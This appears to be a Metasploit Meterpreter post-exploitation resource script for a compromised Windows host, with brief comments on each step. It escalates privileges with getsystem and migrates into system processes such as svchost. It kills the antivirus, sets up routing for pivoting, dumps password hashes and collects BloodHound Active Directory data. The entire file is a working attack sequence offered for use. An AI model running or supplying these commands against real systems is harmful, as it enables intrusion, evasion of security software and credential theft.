#this command will try to get the system right from the local machine
getsystem

#this will migrate the process to the explorer process if getsystem does not work
#else it will try to migrate to a system process like svchost
run post/windows/manage/priv_migrate

# this command will try to kill the av
run post/windows/manage/killav
run post/multi/manage/autoroute
run post/windows/gather/smart_hashdump
run post/windows/gather/bloodhound